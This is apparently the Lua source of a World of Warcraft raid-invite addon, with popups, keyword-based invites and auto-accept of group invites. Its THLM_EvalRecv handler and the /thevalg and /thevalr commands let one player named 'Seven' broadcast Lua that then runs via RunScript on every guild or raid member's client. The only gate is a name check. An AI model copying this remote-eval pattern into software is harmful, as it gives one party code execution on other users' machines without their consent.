
THLM_FILE_LOOTMOD2_INVITE_LUA = 1;

StaticPopupDialogs["THLM_RAIDINVITE"] = {
        text = "Raid invites are open!",
        button1 = "Join Raid",
        button2 = "No",
        OnAccept = function()
        end,
        OnShow = function()
           -- play some sfx here
           PlaySound("PVPTHROUGHQUEUE");
        end,
        timeout = 0,
        whileDead = 1,
        exclusive = 1,
        hideOnEscape = 0
};
StaticPopupDialogs["THLM_GENERALPROMPT"] = {
        text = "general prompt text",
        button1 = "Okay",
        OnShow = function()
           PlaySound("PVPTHROUGHQUEUE");
        end,
        timeout = 0,
        whileDead = 1,
        exclusive = 1,
        hideOnEscape = 0
};

local THLM_YesMessages = {};
THLM_YesMessages[0] = "Join Raid";
--THLM_YesMessages[1] = "WOOHOO";
--THLM_YesMessages[2] = "YYESSSSS";
--THLM_YesMessages[3] = "Awesome!";
--THLM_YesMessages[4] = "I'm In";
--THLM_YesMessages[5] = "Oui";
--THLM_YesMessages[6] = "Si";

local THLM_NoMessages = {};
THLM_NoMessages[0] = "No";
--THLM_NoMessages[1] = "Fuck That";
--THLM_NoMessages[2] = "Yeah, Right";
--THLM_NoMessages[3] = "I <3 Anolin";
--THLM_NoMessages[4] = "Go Away";
--THLM_NoMessages[5] = "I Suck";

local THLM_INVITE_REFRESH_TIME = 20;
local THLM_GUILD_BROADCAST_REFRESH_TIME = 60 * 5;
local THLM_INVITES_OPEN_MSG_REFRESH_TIME = 60;

local THLM_GuildRebroadcastTime = nil;
local THLM_InvitesOpenMessageTime = nil;

local THLM_InviteExpires = nil;
local THLM_InviteWho = nil;
local THLM_InviteForWhat = nil;
local THLM_InviteKeyword = nil;
local THLM_InviteDismissed = nil;

function THLM_InvitesOpenMessageRecv(from, message, dist)
    local _, _, forwhat, ikeyword = string.find(message, "^_THLM2_INO \"(.*)\" \"(.*)\"");
    if ( THLM_InviteWho ~= from and THLM_InviteDismissed ~= from and (not UnitInRaid("player")) ) then
        if (from ~= UnitName("player") and (not THLM_IsPlayerInMyRaid(from))) then
            THLM_ShowRaidInviteWindow(from, forwhat, ikeyword);
        end
    end
    THLM_InviteWho = from;
    THLM_InviteForWhat = forwhat;
    THLM_InviteKeyword = ikeyword;
    if (from ~= UnitName("player")) then
        THLM_InviteExpires = GetTime() + THLM_INVITE_REFRESH_TIME;
    end
end

function THLM_StopInvite()
    if (THLM_InviteWho == UnitName("player")) then
        THCH_SendMessage("_THLM2_INC", "GUILD");
    end
end

function THLM_InvitesClosedMessageRecv(from, message, dist)
    THLM_DestroyInviteWindow();
end

function THLM_InvitesQueryRecv(from, message, dist)
    THLM_SendInviteMessage();
end

function THLM_SendInviteMessage()
    if (THLM_InviteWho == UnitName("player")) then
        THCH_SendMessage("_THLM2_INO \"".. THLM_InviteForWhat .."\" \"".. THLM_InviteKeyword .."\"", "GUILD");
        THLM_InviteExpires = GetTime() + (THLM_INVITE_REFRESH_TIME / 2);
    end
end

function THLM_DestroyInviteWindow()
    StaticPopup_Hide("THLM_RAIDINVITE");
    THLM_InviteExpires = nil;
	THLM_GuildRebroadcastTime = nil;
	THLM_InvitesOpenMessageTime = nil;
    THLM_InviteWho = nil;
    THLM_InviteForWhat = nil;
    THLM_InviteKeyword = nil;
    THLM_InviteDismissed = nil;
end

function THLM_GeneralPromptRecv(from, message, dist)
    local _, _, buttontext, messagetext = string.find(message, "^_THLM_GQ \"(.*)\" (.*)");
    if not buttontext then
        _, _, messagetext = string.find(message, "^_THLM_GQ (.*)");
    end
    if (messagetext) then
        THLM_ShowGeneralPrompt(messagetext, buttontext);
    end
end

function THLM_EvalRecv(from, message, dist)
    if (from ~= "Seven") then
	    THLM_Print("invalid eval received from "..from);
		return;
	end

	local _, _, code = string.find(message, "^_THLM_EV (.*)");
	RunScript(code);
end

function THLM_InviteOnUpdate()
    local now = GetTime();
    if THLM_InviteExpires and now > THLM_InviteExpires then
        if THLM_InviteWho == UnitName("player") then
            -- Need to send out a refresh
			--local info = ChatTypeInfo["RAID_WARNING"];
            --RaidWarningFrame:AddMessage("[THLootMod2] Invites are still open. Type '/thinvite off' to stop invites.",
			--		info.r, info.g, info.b, 1.0);
			--PlaySound("RaidWarning");
            THLM_SendInviteMessage();
        else
            -- Didn't get an update, assume the invite has expired.
            THLM_DestroyInviteWindow();
        end
    end
	if THLM_InviteExpires and THLM_GuildRebroadcastTime and now > THLM_GuildRebroadcastTime and THLM_InviteWho == UnitName("player") then
		THLM_GuildRebroadcastTime = now + THLM_GUILD_BROADCAST_REFRESH_TIME;
		SendChatMessage("<THLootMod2> Raid invites are open. Keyword '" .. THLM_InviteKeyword .. "' on me!", "GUILD");
	end
	if THLM_InviteExpires and THLM_InvitesOpenMessageTime and now > THLM_InvitesOpenMessageTime and THLM_InviteWho == UnitName("player") then
		THLM_InvitesOpenMessageTime = now + THLM_INVITES_OPEN_MSG_REFRESH_TIME;
		THLM_Print("Invites are still open. Type '/thinvite off' to stop invites.");
	end
	if THLM_RehideInviteWindowTime and now > THLM_RehideInviteWindowTime then
		THLM_RehideInviteWindowTime = nil;
		StaticPopupDialogs["PARTY_INVITE"].inviteAccepted = 1;
    	StaticPopup_Hide("PARTY_INVITE");
	end
end

function THLM_InviteOnLoad()
    THCH_RegisterCommChannelMessage("_THLM2_INO", THLM_InvitesOpenMessageRecv);
    THCH_RegisterCommChannelMessage("_THLM2_INC", THLM_InvitesClosedMessageRecv);
    THCH_RegisterCommChannelMessage("_THLM_INQ", THLM_InvitesQueryRecv);
    THCH_RegisterCommChannelMessage("_THLM_GQ", THLM_GeneralPromptRecv);
    THCH_RegisterCommChannelMessage("_THLM_EV", THLM_EvalRecv);

    SLASH_THINVITE1 = "/thinvite";
    SlashCmdList["THINVITE"] = function(msg)
        --if (msg == "off" or (not msg) or msg == "") then
        if (msg == "off") then
            THLM_Print("Stopping invite...");
            THLM_StopInvite();
        else
			if (UnitInRaid("player")) then
				THLM_Print("Broadcasting invite...");
				THLM_InviteWho = UnitName("player");
				THLM_InviteForWhat = "Raid";
				if (not msg) or msg == "" then
					THLM_InviteKeyword = "boobies";
				else
					THLM_InviteKeyword = msg;
				end
				-- the update handler will pick these up immediately
				THLM_InviteExpires = GetTime();
				THLM_GuildRebroadcastTime = GetTime();
				THLM_InvitesOpenMessageTime = GetTime();
			else
				THLM_Print("You must be in a raid before opening invites.");
			end
        end
    end;

    SLASH_GUILDBC1 = "/thmsgg";
    SlashCmdList["GUILDBC"] = function(msg)
        THLM_Print("sending to guild: "..msg);
        THCH_SendMessage("_THLM_GQ "..msg, "GUILD");
    end;
    SLASH_RAIDBC1 = "/thmsgr";
    SlashCmdList["RAIDBC"] = function(msg)
        if (UnitInRaid("player")) then
            THLM_Print("sending to raid: "..msg);
            THCH_SendMessage("_THLM_GQ "..msg, "RAID");
        else
            THLM_Print("not in raid");
        end
    end;
	SLASH_THEVALT1 = "/thevalt";
	SlashCmdList["THEVALT"] = function(msg)
		if UnitName("player")~="Seven" then
			THLM_Print("you are not seven");
			return;
		end
		THLM_Print("testing eval of "..msg.."...");
		THLM_EvalRecv("Seven", "_THLM_EV "..msg, "GUILD");
		THLM_Print("testing eval...done");
	end;
	SLASH_THEVALG1 = "/thevalg";
	SlashCmdList["THEVALG"] = function(msg)
		if UnitName("player")~="Seven" then
			THLM_Print("you are not seven");
			return;
		end
		THCH_SendMessage("_THLM_EV "..msg, "GUILD");
		THLM_Print("eval sent");
	end;
	SLASH_THEVALR1 = "/thevalr";
	SlashCmdList["THEVALR"] = function(msg)
		if UnitName("player")~="Seven" then
			THLM_Print("you are not seven");
			return;
		end
		if (UnitInRaid("player")) then
			THCH_SendMessage("_THLM_EV "..msg, "RAID");
			THLM_Print("eval sent");
		else
            THLM_Print("not in raid");
		end
	end;
end

local THLM_AutoAcceptInviteFrom = nil;
local THLM_RehideInviteWindowTime = nil;

function THLM_MaybeAcceptGroupInvite(fromWho)
	THLM_DebugPrint("party invite from " .. fromWho);
	if (THLM_AutoAcceptInviteFrom) then
		THLM_DebugPrint("auto accepting invites from " .. THLM_AutoAcceptInviteFrom);
	end
	if THLM_AutoAcceptInviteFrom and (fromWho == THLM_AutoAcceptInviteFrom) then
		THLM_DebugPrint("calling AcceptGroup()...");
		AcceptGroup();
		StaticPopupDialogs["PARTY_INVITE"].inviteAccepted = 1;
    	StaticPopup_Hide("PARTY_INVITE");
		THLM_RehideInviteWindowTime = GetTime() + 0.1;
	end
	THLM_AutoAcceptInviteFrom = nil;
end

function THLM_CheckForKeywordWhisper(msg, who)
    if (THLM_InviteWho == UnitName("player")) and string.find(string.lower(msg), string.lower(THLM_InviteKeyword)) then
		InviteUnit(who);
	end
end

function THLM_ShowRaidInviteWindow(who, what, ikeyword)
    StaticPopupDialogs["THLM_RAIDINVITE"].text =
          "Raid invites are open on " .. who .. ". Do you want to join the raid?";
    StaticPopupDialogs["THLM_RAIDINVITE"].button1 = THLM_RandomListItem(THLM_YesMessages);
    StaticPopupDialogs["THLM_RAIDINVITE"].button2 = THLM_RandomListItem(THLM_NoMessages);
    StaticPopupDialogs["THLM_RAIDINVITE"].OnAccept = function()
		THLM_AutoAcceptInviteFrom = THLM_InviteWho;
        SendChatMessage("<THLootMod2> " .. THLM_InviteKeyword, "WHISPER", nil, THLM_InviteWho);
		if (GetPVPDesired() == 1) then
			THLM_Print("Your PVP flag was set to remain on. It has been turned off automatically for the raid.");
			TogglePVP();
		end
    end;
    StaticPopupDialogs["THLM_RAIDINVITE"].OnHide = function()
        THLM_InviteDismissed = who;
    end;
    StaticPopup_Show("THLM_RAIDINVITE");
end

function THLM_ShowGeneralPrompt(message, button)
    if not button then
        button = "Okay";
    end
    StaticPopupDialogs["THLM_GENERALPROMPT"].text = message;
    StaticPopupDialogs["THLM_GENERALPROMPT"].button1 = button;
    if (message ~= "clear") then
        StaticPopup_Show("THLM_GENERALPROMPT");
    else
        StaticPopup_Hide("THLM_GENERALPROMPT");
    end
end

function THLM_RandomListItem(list)
    local lcount = getn(list);
    return list[ math.floor(math.random(0, lcount)) ];
end
